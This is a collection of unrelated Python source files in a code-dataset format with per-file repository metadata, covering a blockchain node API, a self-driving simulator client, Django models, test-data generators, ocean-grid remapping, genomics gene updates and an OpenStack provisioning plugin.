status, error = await self.full_node.respond_transaction(request.transaction, spend_name)
error_name = error.name if error is not None else None
if status == MempoolInclusionStatus.SUCCESS:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
else:
# If it failed or is pending but previously succeeded (it is already in the mempool), this is idempotent, so return SUCCESS
if self.full_node.mempool_manager.get_spendbundle(spend_name) is not None:
response = wallet_protocol.TransactionAck(spend_name, uint8(MempoolInclusionStatus.SUCCESS.value), None)
else:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
msg = make_msg(ProtocolMessageTypes.transaction_ack, response)
return msg
@api_request
async def request_puzzle_solution(self, request: wallet_protocol.RequestPuzzleSolution) -> Optional[Message]:
coin_name = request.coin_name
height = request.height
coin_record = await self.full_node.coin_store.get_coin_record(coin_name)
reject = wallet_protocol.RejectPuzzleSolution(coin_name, height)
reject_msg = make_msg(ProtocolMessageTypes.reject_puzzle_solution, reject)
if coin_record is None or coin_record.spent_block_index != height:
return reject_msg
header_hash = self.full_node.blockchain.height_to_hash(height)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is None or block.transactions_generator is None:
return reject_msg
block_generator: Optional[BlockGenerator] = await self.full_node.blockchain.get_block_generator(block)
assert block_generator is not None
error, puzzle, solution = get_puzzle_and_solution_for_coin(
block_generator, coin_name, self.full_node.constants.MAX_BLOCK_COST_CLVM
)
if error is not None:
return reject_msg
pz = Program.to(puzzle)
sol = Program.to(solution)
wrapper = PuzzleSolutionResponse(coin_name, height, pz, sol)
response = wallet_protocol.RespondPuzzleSolution(wrapper)
response_msg = make_msg(ProtocolMessageTypes.respond_puzzle_solution, response)
return response_msg
@api_request
async def request_header_blocks(self, request: wallet_protocol.RequestHeaderBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
return None
header_hashes = []
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectHeaderBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_header_blocks, reject)
return msg
header_hashes.append(self.full_node.blockchain.height_to_hash(uint32(i)))
blocks: List[FullBlock] = await self.full_node.block_store.get_blocks_by_hash(header_hashes)
header_blocks = []
for block in blocks:
added_coins_records = await self.full_node.coin_store.get_coins_added_at_height(block.height)
removed_coins_records = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
added_coins = [record.coin for record in added_coins_records if not record.coinbase]
removal_names = [record.coin.name() for record in removed_coins_records]
header_block = get_block_header(block, added_coins, removal_names)
header_blocks.append(header_block)
msg = make_msg(
ProtocolMessageTypes.respond_header_blocks,
wallet_protocol.RespondHeaderBlocks(request.start_height, request.end_height, header_blocks),
)
return msg
@api_request
async def respond_compact_proof_of_time(self, request: timelord_protocol.RespondCompactProofOfTime):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_proof_of_time(request)
@execute_task
@peer_required
@api_request
async def new_compact_vdf(self, request: full_node_protocol.NewCompactVDF, peer: ws.WSFlaxConnection):
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.compact_vdf_lock:
await self.full_node.new_compact_vdf(request, peer)
@peer_required
@api_request
async def request_compact_vdf(self, request: full_node_protocol.RequestCompactVDF, peer: ws.WSFlaxConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.request_compact_vdf(request, peer)
@peer_required
@api_request
async def respond_compact_vdf(self, request: full_node_protocol.RespondCompactVDF, peer: ws.WSFlaxConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_vdf(request, peer)
| 47.555556
| 120
| 0.64069
|
3bdce29883d28edc1f06783c61b228d180582d72
| 4,464
|
py
|
Python
|
drive.py
|
terrylu87/CarND-Behavioral-Cloning-P3
|
2f2adde44e906995405fb6ea04beafbb2ec1381f
|
[
"MIT"
] | null | null | null |
drive.py
|
terrylu87/CarND-Behavioral-Cloning-P3
|
2f2adde44e906995405fb6ea04beafbb2ec1381f
|
[
"MIT"
] | null | null | null |
drive.py
|
terrylu87/CarND-Behavioral-Cloning-P3
|
2f2adde44e906995405fb6ea04beafbb2ec1381f
|
[
"MIT"
] | null | null | null |
import argparse
import base64
from datetime import datetime
import os
import shutil
import numpy as np
import socketio
import eventlet
import eventlet.wsgi
from PIL import Image
from flask import Flask
from io import BytesIO
import cv2
from keras.models import load_model
import h5py
from keras import __version__ as keras_version
sio = socketio.Server()
app = Flask(__name__)
model = None
prev_image_array = None
class SimplePIController:
def __init__(self, Kp, Ki):
self.Kp = Kp
self.Ki = Ki
self.set_point = 0.
self.error = 0.
self.integral = 0.
def set_desired(self, desired):
self.set_point = desired
def update(self, measurement):
# proportional error
self.error = self.set_point - measurement
# integral error
self.integral += self.error
return self.Kp * self.error + self.Ki * self.integral
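# SimplePIController is a plain proportional-integral loop:
# output = Kp * error + Ki * accumulated_error. It is used below to turn the
# reported speed into a throttle value that holds the car near set_speed,
# while the steering angle comes from the neural network.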
controller = SimplePIController(0.1, 0.002)
set_speed = 9
controller.set_desired(set_speed)
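# shrink() below block-averages an array by an integer factor S along every
# axis (for example a 160x320 image becomes 80x160 with S=2); each axis length
# must be divisible by S. It appears to be unused in this script.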
def shrink(a, S=2): # S : shrink factor
new_shp = np.vstack((np.array(a.shape)//S,[S]*a.ndim)).ravel('F')
return a.reshape(new_shp).mean(tuple(1+2*np.arange(a.ndim)))
@sio.on('telemetry')
def telemetry(sid, data):
if data:
# The current steering angle of the car
steering_angle = data["steering_angle"]
# The current throttle of the car
throttle = data["throttle"]
# The current speed of the car
speed = data["speed"]
# The current image from the center camera of the car
imgString = data["image"]
image = Image.open(BytesIO(base64.b64decode(imgString)))
#image = image.resize((160, 80),Image.ANTIALIAS)
image = image.resize((160, 80))
image_array = np.asarray(image)
# resize image
#image_array = np.asarray(timage)
# Convert RGB to BGR
#print(image.shape)
#print(timage.shape)
#print(image_array.shape)
#image_array = np.array(cv_image)
#steering_angle = float(model.predict(image_array, batch_size=1))
steering_angle = float(model.predict(image_array[None, :, :, :], batch_size=1))
throttle = controller.update(float(speed))
print(steering_angle, throttle)
send_control(steering_angle, throttle)
# save frame
if args.image_folder != '':
timestamp = datetime.utcnow().strftime('%Y_%m_%d_%H_%M_%S_%f')[:-3]
image_filename = os.path.join(args.image_folder, timestamp)
image.save('{}.jpg'.format(image_filename))
else:
# NOTE: DON'T EDIT THIS.
sio.emit('manual', data={}, skip_sid=True)
@sio.on('connect')
def connect(sid, environ):
print("connect ", sid)
send_control(0, 0)
def send_control(steering_angle, throttle):
sio.emit(
"steer",
data={
'steering_angle': steering_angle.__str__(),
'throttle': throttle.__str__()
},
skip_sid=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Remote Driving')
parser.add_argument(
'model',
type=str,
help='Path to model h5 file. Model should be on the same path.'
)
parser.add_argument(
'image_folder',
type=str,
nargs='?',
default='',
help='Path to image folder. This is where the images from the run will be saved.'
)
args = parser.parse_args()
# check that model Keras version is same as local Keras version
f = h5py.File(args.model, mode='r')
model_version = f.attrs.get('keras_version')
keras_version = str(keras_version).encode('utf8')
if model_version != keras_version:
print('You are using Keras version ', keras_version,
', but the model was built using ', model_version)
model = load_model(args.model)
if args.image_folder != '':
print("Creating image folder at {}".format(args.image_folder))
if not os.path.exists(args.image_folder):
os.makedirs(args.image_folder)
else:
shutil.rmtree(args.image_folder)
os.makedirs(args.image_folder)
print("RECORDING THIS RUN ...")
else:
print("NOT RECORDING THIS RUN ...")
# wrap Flask application with engineio's middleware
app = socketio.Middleware(sio, app)
# deploy as an eventlet WSGI server
eventlet.wsgi.server(eventlet.listen(('', 4567)), app)
| 28.8
| 89
| 0.634409
|
4559121f9f16189e0b3cc9278a4411d4c99476bd
| 3,149
|
py
|
Python
|
model_mommy/generators.py
|
GradConnection/model_mommy
|
520de3c6bb79aadbaa3594f2677e0e2b7816c4ea
|
[
"Apache-2.0"
] | null | null | null |
model_mommy/generators.py
|
GradConnection/model_mommy
|
520de3c6bb79aadbaa3594f2677e0e2b7816c4ea
|
[
"Apache-2.0"
] | null | null | null |
model_mommy/generators.py
|
GradConnection/model_mommy
|
520de3c6bb79aadbaa3594f2677e0e2b7816c4ea
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
"""
Generators are callables that return a value used to populate a field.
If this callable has a `required` attribute (a list, mostly), for each item in
the list, if the item is a string, the field attribute with the same name will
be fetched from the field and used as argument for the generator. If it is a
callable (which will receive `field` as first argument), it should return a
list in the format (key, value) where key is the argument name for generator
and value is the value for that argument.
"""
import string
from decimal import Decimal
from os.path import abspath, join, dirname
from random import randint, choice, random
from django import VERSION
from django.contrib.contenttypes.models import ContentType
from django.core.files.base import ContentFile
from django.db.models import get_models
from model_mommy.timezone import now
MAX_LENGTH = 300
# Using sys.maxint here breaks a bunch of tests when running against a
# Postgres database.
MAX_INT = 10000
def get_content_file(content, name):
if VERSION < (1, 4):
return ContentFile(content)
else:
return ContentFile(content, name=name)
def gen_file_field():
name = u'mock_file.txt'
file_path = abspath(join(dirname(__file__), name))
with open(file_path, 'rb') as f:
return get_content_file(f.read(), name=name)
def gen_image_field():
name = u'mock-img.jpeg'
file_path = abspath(join(dirname(__file__), name))
with open(file_path, 'rb') as f:
return get_content_file(f.read(), name=name)
def gen_from_list(L):
'''Makes sure all values of the field are generated from the list L
Usage:
from mommy import Mommy
class KidMommy(Mommy):
attr_mapping = {'some_field':gen_from_list([A, B, C])}
'''
return lambda: choice(L)
# -- DEFAULT GENERATORS --
def gen_from_choices(C):
choice_list = map(lambda x: x[0], C)
return gen_from_list(choice_list)
def gen_integer(min_int=-MAX_INT, max_int=MAX_INT):
return randint(min_int, max_int)
def gen_float():
return random() * gen_integer()
def gen_decimal(max_digits, decimal_places):
num_as_str = lambda x: ''.join([str(randint(0, 9)) for i in range(x)])
return Decimal("%s.%s" % (num_as_str(max_digits - decimal_places),
num_as_str(decimal_places)))
gen_decimal.required = ['max_digits', 'decimal_places']
def gen_date():
return now().date()
def gen_datetime():
return now()
def gen_time():
return now().time()
def gen_string(max_length):
return u''.join(choice(string.ascii_letters) for i in range(max_length))
gen_string.required = ['max_length']
def gen_slug(max_length=50):
valid_chars = string.ascii_letters + string.digits + '_-'  # string.letters is Python 2 only
return u''.join(choice(valid_chars) for i in range(max_length))
def gen_text():
return gen_string(MAX_LENGTH)
def gen_boolean():
return choice((True, False))
def gen_url():
return u'http://www.%s.com' % gen_string(30)
def gen_email():
return u"%s@example.com" % gen_string(10)
def gen_content_type():
return ContentType.objects.get_for_model(choice(get_models()))
| 26.024793
| 78
| 0.705621
|
fdef21ffa4b9bc2971773a0134b51a13a04b4687
| 420
|
py
|
Python
|
env/Lib/site-packages/plotly/validators/scatter/_hovertemplatesrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
env/Lib/site-packages/plotly/validators/scatter/_hovertemplatesrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
env/Lib/site-packages/plotly/validators/scatter/_hovertemplatesrc.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import _plotly_utils.basevalidators
class HovertemplatesrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(self, plotly_name="hovertemplatesrc", parent_name="scatter", **kwargs):
super(HovertemplatesrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
| 35
| 88
| 0.692857
|
36ea597065c36bdfe1567ced706f0a5f2b3bd875
| 8,844
|
py
|
Python
|
AcadeMeData/models.py
|
DeanCivlin/AcadeMe
|
33c4f635506c3327db510da0f26c822db3dd848d
|
[
"MIT"
] | null | null | null |
AcadeMeData/models.py
|
DeanCivlin/AcadeMe
|
33c4f635506c3327db510da0f26c822db3dd848d
|
[
"MIT"
] | null | null | null |
AcadeMeData/models.py
|
DeanCivlin/AcadeMe
|
33c4f635506c3327db510da0f26c822db3dd848d
|
[
"MIT"
] | null | null | null |
from django.db import models, transaction
from django.conf import settings
from django.contrib.auth.models import User as DjangoUser
from django.core.validators import MinValueValidator, MaxValueValidator
from django.utils import timezone
class DEGREECHOICES(models.TextChoices):
Computer_Science = 'CS', 'Computer Science'
Psychology = 'PS', 'Psychology'
GOVERNMENT = 'GV', 'Government'
Business_Administration = 'BA', 'Business Administration'
Unknown = 'UN', 'Unknown'
class UNIVERSITYCHOICES(models.TextChoices):
Reichman_University = 'RU', 'Reichman University'
Hebrew_University = 'HU', 'Hebrew University'
Tel_Aviv_University = 'TA', 'Tel Aviv University'
Beer_Sheva_University = 'BS', "Be'er Sheva University"
Unknown = 'UN', 'Unknown'
class User(models.Model):
# The AUTH_USER_MODEL is the built in user model from django
# Goto: https://docs.djangoproject.com/en/3.2/ref/contrib/auth/ for API
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, primary_key=True)
# name = models.CharField(max_length=30, default="")  # the name/username comes from Django's built-in user model
university = models.CharField(max_length=2, choices=UNIVERSITYCHOICES.choices, default=UNIVERSITYCHOICES.Unknown)
degree = models.CharField(max_length=2, choices=DEGREECHOICES.choices, default=DEGREECHOICES.Unknown)
@staticmethod
def create_user(username, email, password, university, degree):
django_user = DjangoUser.objects.create_user(username=username,
email=email,
password=password)
user = User(user=django_user,
university=university,
degree=degree)
user.save()
return user
@staticmethod
def del_user(self):
try:
self.user.delete()
except User.DoesNotExist:
return False
return True
@staticmethod
def get_user(username):
try:
user = DjangoUser.objects.get(username=username)
except DjangoUser.DoesNotExist:
return None
return user
class Degree(models.Model):
degree_id = models.IntegerField(primary_key=True, validators=[MinValueValidator(0)], default=0)
name = models.CharField(max_length=100)
universities = models.TextField(null=True, blank=True) # Format should be "Uni1, Uni2, Uni3,..."
description = models.TextField(null=True, blank=True) # Describes the degree
# methods
def __str__(self):
"""
Return the name of this degree.
"""
return self.name
@staticmethod
def create_degree(degree_id, name, universities, description):
"""
Creates a Degree object.
"""
degree = Degree(degree_id=degree_id, name=name, universities=universities, description=description)
degree.save()
return degree
@staticmethod
def get_degree_by_name(name):
"""
Return the Degree object whose name is 'name', or None if it does not exist.
"""
try:
degree = Degree.objects.get(name=name)
except Degree.DoesNotExist:
return None
return degree
class University(models.Model):
university_id = models.IntegerField(
primary_key=True, validators=[MinValueValidator(0)])
name = models.CharField(max_length=100)
location = models.CharField(max_length=100)
# maybe change here to: description = models.TextField()
description = models.TextField(null=True, blank=True)
def __str__(self):
return self.name
@staticmethod
def get_university_by_name(name):
# Returns the University whose name matches the given name
return University.objects.get(name=name)
@staticmethod
def get_university_by_location(location):
# Returns the University at the given location
return University.objects.get(location=location)
class Professor(models.Model):
professor_id = models.IntegerField(primary_key=True, validators=[MinValueValidator(0)])
name = models.CharField(max_length=100)
university = models.ForeignKey(University, on_delete=models.RESTRICT) # , related_name='%(class)s_something')
description = models.TextField(null=True, blank=True)
rate = models.DecimalField(max_digits=2, decimal_places=1, validators=[MinValueValidator(1), MaxValueValidator(5)],
blank=True, null=True) # average professor rating, starts as null
def __str__(self):
return self.name
@staticmethod
def create_professor(professor_id, name, university, description, rate):
professor = Professor(professor_id=professor_id,
name=name,
university=university,
description=description,
rate=rate)
professor.save()
return professor
@staticmethod
def get_professor(name):
try:
professor = Professor.objects.get(name=name)
except Professor.DoesNotExist:
return None
return professor
def get_name(self):
return self.name
def get_description(self):
return self.description
class Course(models.Model):
course_id = models.IntegerField(primary_key=True, validators=[MinValueValidator(0)], default=0)
name = models.CharField(max_length=100, unique=True)
degree = models.ManyToManyField(Degree)
mandatory = models.BooleanField(default=False) # False for elective, True for mandatory
description = models.TextField(null=True, blank=True)
professor = models.ForeignKey(Professor, on_delete=models.RESTRICT)
university = models.ForeignKey(University, on_delete=models.RESTRICT)
@staticmethod
def create_course(course_id, name, degree, mandatory, description, professor, university):
"""
Creates a Course object.
"""
course = Course(course_id=course_id,
name=name,
mandatory=mandatory,
description=description,
professor=professor,
university=university)
course.degree.add(degree)
course.save()
return course
def __str__(self):
return self.name
@staticmethod
def get_course_by_name(name):
"""
Return the Course object whose name is 'name', or None if it does not exist.
"""
try:
course = Course.objects.get(name=name)
return course
except Course.DoesNotExist:
return None
def course_belongs(self, university, degree):
"""
Returns True if this course belongs to the given degree at the given university.
"""
return degree in self.degree.all() and university == self.university
class MessageBoards(models.Model):
id = models.IntegerField(primary_key=True)
courseName = models.ForeignKey(Course, null=False, blank=True, on_delete=models.CASCADE, default=0)
def __str__(self):
return str(self.id)
@staticmethod
def create_msgboard(id, courseName):
msgboard = MessageBoards(id=id, courseName=courseName)
msgboard.save()
return msgboard
@staticmethod
def get_msgboard_by_id(id):
return MessageBoards.objects.get(id=id)
@staticmethod
def get_msgboard_by_course(course):
return MessageBoards.objects.get(courseName=course)
class Messages(models.Model):
msgID = models.IntegerField(primary_key=True)
userID = models.ForeignKey(User, on_delete=models.CASCADE, default=0)
text = models.TextField(max_length=300)
msgDate = models.DateTimeField(default=timezone.now)
board = models.ForeignKey(MessageBoards, on_delete=models.CASCADE, default=1)
def get_msg(self):
return self.msgID
    @staticmethod
    def create_message(id, user, text, board):
with transaction.atomic():
msg = Messages(msgID=id, userID=user, text=text, board=board)
msg.save()
return msg
@staticmethod
def get_msg_by_id(msgID):
return Messages.objects.get(msgID=msgID)
class MessageTags(models.Model):
id = models.IntegerField(primary_key=True, default=0)
msg = models.ForeignKey(Messages, on_delete=models.CASCADE)
userID = models.ForeignKey(User, on_delete=models.CASCADE)
    @staticmethod
    def create_msgtag(id, msg, userID):
with transaction.atomic():
tag = MessageTags(id=id, msg=msg, userID=userID)
tag.save()
return tag
def __str__(self):
        return str(self.id)
    @staticmethod
    def get_msg_tag(id):
return MessageTags.objects.get(id=id)
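# --- Hedged usage sketch (not part of the original models.py) ---
# Shows how the factory/getter helpers defined above are meant to fit together.
# All identifiers and values below are hypothetical examples; running this
# requires a configured Django project with a database, and it assumes a
# Degree named "Computer Science" has already been created.
def _example_model_usage():
    university = University(university_id=1, name="Example University",
                            location="Example City")
    university.save()
    degree = Degree.get_degree_by_name("Computer Science")  # None if it does not exist yet
    professor = Professor.create_professor(professor_id=1, name="Jane Doe",
                                           university=university,
                                           description="", rate=None)
    course = Course.create_course(course_id=1, name="Algorithms", degree=degree,
                                  mandatory=True, description="",
                                  professor=professor, university=university)
    # course_belongs() checks both degree membership and the owning university.
    return course.course_belongs(university, degree)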
| 34.27907
| 120
| 0.656151
|
ef9316722e7ddcdc58e2b7936e42f8b2abe45f1e
| 309
|
py
|
Python
|
books/admin.py
|
devsingh-code/django-digital-marketplace
|
f0f0d2daebaeedeb7ff5b83154313fcce21b2886
|
[
"MIT"
] | 1
|
2020-06-13T11:23:18.000Z
|
2020-06-13T11:23:18.000Z
|
books/admin.py
|
devsingh-code/django-digital-marketplace
|
f0f0d2daebaeedeb7ff5b83154313fcce21b2886
|
[
"MIT"
] | null | null | null |
books/admin.py
|
devsingh-code/django-digital-marketplace
|
f0f0d2daebaeedeb7ff5b83154313fcce21b2886
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Author, Book, Exercise, Chapter, Solution, UserLibrary
# Register your models here.
admin.site.register(Author)
admin.site.register(Book)
admin.site.register(Exercise)
admin.site.register(Chapter)
admin.site.register(Solution)
admin.site.register(UserLibrary)
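# Hedged sketch (not part of the original admin.py): the register() calls above
# use the default ModelAdmin. If list columns or search were wanted, the
# decorator form could be used instead; it is kept commented out here because
# Book is already registered above, and the field names are assumptions rather
# than values taken from books/models.py.
#
# @admin.register(Book)
# class BookAdmin(admin.ModelAdmin):
#     list_display = ("id", "name")
#     search_fields = ("name",)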
| 28.090909
| 69
| 0.828479
|
766314ef344c0310f3037878c7bfa983b2c55a4f
| 1,434
|
py
|
Python
|
examples/Beaufort/make_weight_files.py
|
bilgetutak/pyroms
|
3b0550f26f4ac181b7812e14a7167cd1ca0797f0
|
[
"BSD-3-Clause"
] | 75
|
2016-04-05T07:15:57.000Z
|
2022-03-04T22:49:54.000Z
|
examples/Beaufort/make_weight_files.py
|
hadfieldnz/pyroms-mgh
|
cd0fe39075825f97a7caf64e2c4c5a19f23302fd
|
[
"BSD-3-Clause"
] | 27
|
2017-02-26T04:27:49.000Z
|
2021-12-01T17:26:56.000Z
|
examples/Beaufort/make_weight_files.py
|
hadfieldnz/pyroms-mgh
|
cd0fe39075825f97a7caf64e2c4c5a19f23302fd
|
[
"BSD-3-Clause"
] | 56
|
2016-05-11T06:19:14.000Z
|
2022-03-22T19:04:17.000Z
|
import pyroms
# Part of Arctic2 grid containing the Beaufort
irange=(370,580)
jrange=(460,580)
#irange=None
#jrange=None
srcgrd = pyroms.grid.get_ROMS_grid('ARCTIC2')
dstgrd = pyroms.grid.get_ROMS_grid('BEAUFORT2')
pyroms.remapping.make_remap_grid_file(srcgrd,irange=irange,jrange=jrange)
pyroms.remapping.make_remap_grid_file(srcgrd,Cpos='u',irange=irange,jrange=jrange)
pyroms.remapping.make_remap_grid_file(srcgrd,Cpos='v',irange=irange,jrange=jrange)
pyroms.remapping.make_remap_grid_file(dstgrd)
pyroms.remapping.make_remap_grid_file(dstgrd,Cpos='u')
pyroms.remapping.make_remap_grid_file(dstgrd,Cpos='v')
cpos_list = ['rho','u','v']
for typ in cpos_list:
    for tip in cpos_list:
grid1_file = 'remap_grid_ARCTIC2_'+str(typ)+'.nc'
grid2_file = 'remap_grid_BEAUFORT2_'+str(tip)+'.nc'
interp_file1 = 'remap_weights_ARCTIC2_to_BEAUFORT2_bilinear_'+str(typ)+'_to_'+str(tip)+'.nc'
interp_file2 = 'remap_weights_BEAUFORT2_to_ARCTIC2_bilinear_'+str(tip)+'_to_'+str(typ)+'.nc'
map1_name = 'ARCTIC2 to BEAUFORT Bilinear Mapping'
map2_name = 'BEAUFORT to ARCTIC2 Bilinear Mapping'
num_maps = 1
map_method = 'bilinear'
print("Making "+str(interp_file1)+"...")
pyroms.remapping.compute_remap_weights(grid1_file,grid2_file,\
interp_file1,interp_file2,map1_name,\
map2_name,num_maps,map_method)
| 37.736842
| 100
| 0.707113
|
4d5a0373a51dc03d4d4750f3a61d0b2d89cf869d
| 3,471
|
py
|
Python
|
scout/commands/update/genes.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
scout/commands/update/genes.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
scout/commands/update/genes.py
|
bjhall/scout
|
ea772cf8d233223e0ec5271f61b95d3afcf719ad
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
"""
update/genes.py
Build a file with genes that are based on hgnc format.
Parses ftp://ftp.ebi.ac.uk/pub/databases/genenames/new/tsv/hgnc_complete_set.txt,
ftp.broadinstitute.org/pub/ExAC_release/release0.3/functional_gene_constraint/
and a biomart dump from ensembl with
'Gene ID' 'Chromosome' 'Gene Start' 'Gene End' 'HGNC symbol'
The hgnc file will determine which genes are added and most of the meta information.
The ensembl gene file will add coordinates and the exac file will add pLi scores.
Created by Måns Magnusson on 2015-01-14.
Copyright (c) 2015 __MoonsoInc__. All rights reserved.
"""
import logging
import click
from flask.cli import with_appcontext, current_app
from pprint import pprint as pp
from scout.load import load_hgnc_genes, load_transcripts, load_exons
from scout.server.extensions import store
from scout.utils.link import link_genes
from scout.utils.handle import get_file_handle
from scout.utils.scout_requests import (
fetch_mim_files,
fetch_hpo_genes,
fetch_hgnc,
fetch_ensembl_genes,
fetch_exac_constraint,
fetch_ensembl_transcripts,
)
LOG = logging.getLogger(__name__)
@click.command("genes", short_help="Update all genes")
@click.option(
"--build",
type=click.Choice(["37", "38"]),
help="What genome build should be used. If no choice update 37 and 38.",
)
@click.option("--api-key", help="Specify the api key")
@with_appcontext
def genes(build, api_key):
"""
Load the hgnc aliases to the mongo database.
"""
LOG.info("Running scout update genes")
adapter = store
# Fetch the omim information
api_key = api_key or current_app.config.get("OMIM_API_KEY")
mim_files = {}
if not api_key:
LOG.warning(
"No omim api key provided, Please not that some information will be missing"
)
else:
try:
mim_files = fetch_mim_files(
api_key, mim2genes=True, morbidmap=True, genemap2=True
)
except Exception as err:
LOG.warning(err)
raise click.Abort()
LOG.warning("Dropping all gene information")
adapter.drop_genes(build)
LOG.info("Genes dropped")
LOG.warning("Dropping all transcript information")
adapter.drop_transcripts(build)
LOG.info("transcripts dropped")
hpo_genes = fetch_hpo_genes()
if build:
builds = [build]
else:
builds = ["37", "38"]
hgnc_lines = fetch_hgnc()
exac_lines = fetch_exac_constraint()
for build in builds:
ensembl_genes = fetch_ensembl_genes(build=build)
# load the genes
hgnc_genes = load_hgnc_genes(
adapter=adapter,
ensembl_lines=ensembl_genes,
hgnc_lines=hgnc_lines,
exac_lines=exac_lines,
mim2gene_lines=mim_files.get("mim2genes"),
genemap_lines=mim_files.get("genemap2"),
hpo_lines=hpo_genes,
build=build,
)
ensembl_genes = {}
for gene_obj in hgnc_genes:
ensembl_id = gene_obj["ensembl_id"]
ensembl_genes[ensembl_id] = gene_obj
# Fetch the transcripts from ensembl
ensembl_transcripts = fetch_ensembl_transcripts(build=build)
transcripts = load_transcripts(
adapter, ensembl_transcripts, build, ensembl_genes
)
adapter.update_indexes()
LOG.info("Genes, transcripts and Exons loaded")
| 28.925
| 89
| 0.680496
|
40da094b36ee23297d997825fc9cf022b98b0862
| 10,013
|
py
|
Python
|
packstack/plugins/provision_700.py
|
melroyr/havana-packstack
|
72cdb0e5e29df4cccb81844ec8b365dfededf4f7
|
[
"Apache-2.0"
] | null | null | null |
packstack/plugins/provision_700.py
|
melroyr/havana-packstack
|
72cdb0e5e29df4cccb81844ec8b365dfededf4f7
|
[
"Apache-2.0"
] | null | null | null |
packstack/plugins/provision_700.py
|
melroyr/havana-packstack
|
72cdb0e5e29df4cccb81844ec8b365dfededf4f7
|
[
"Apache-2.0"
] | null | null | null |
"""
Installs and configures neutron
"""
import logging
from packstack.installer import validators
from packstack.modules.common import is_all_in_one
from packstack.modules.ospluginutils import (appendManifestFile,
getManifestTemplate)
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-Provision"
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
logging.debug("Provisioning OpenStack resources for demo usage and testing")
def process_provision(param, process_args=None):
return param if is_all_in_one(controller.CONF) else 'n'
conf_params = {
"PROVISION_INIT" : [
{"CMD_OPTION" : "provision-demo",
"USAGE" : ("Whether to provision for demo usage and testing. Note "
"that provisioning is only supported for all-in-one "
"installations."),
"PROMPT" : "Would you like to provision for demo usage and testing?",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"PROCESSORS" : [process_provision],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_DEMO",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "provision-tempest",
"USAGE" : ("Whether to configure tempest for testing. Note "
"that provisioning is only supported for all-in-one "
"installations."),
"PROMPT" : "Would you like to configure Tempest (OpenStack test suite)?",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"PROCESSORS" : [process_provision],
"DEFAULT_VALUE" : "n",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_TEMPEST",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"PROVISION_DEMO" : [
{"CMD_OPTION" : "provision-demo-floatrange",
"USAGE" : "The CIDR network address for the floating IP subnet",
"PROMPT" : "Enter the network address for the floating IP subnet:",
"OPTION_LIST" : False,
"VALIDATORS" : False,
"DEFAULT_VALUE" : "172.24.4.224/28",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_DEMO_FLOATRANGE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
"TEMPEST_GIT_REFS" : [
{"CMD_OPTION" : "provision-tempest-repo-uri",
"USAGE" : "The uri of the tempest git repository to use",
"PROMPT" : "What is the uri of the Tempest git repository?",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : "https://github.com/openstack/tempest.git",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_TEMPEST_REPO_URI",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "provision-tempest-repo-revision",
"USAGE" : "The revision of the tempest git repository to use",
"PROMPT" : "What revision, branch, or tag of the Tempest git repository should be used?",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : "stable/havana",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_PROVISION_TEMPEST_REPO_REVISION",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
],
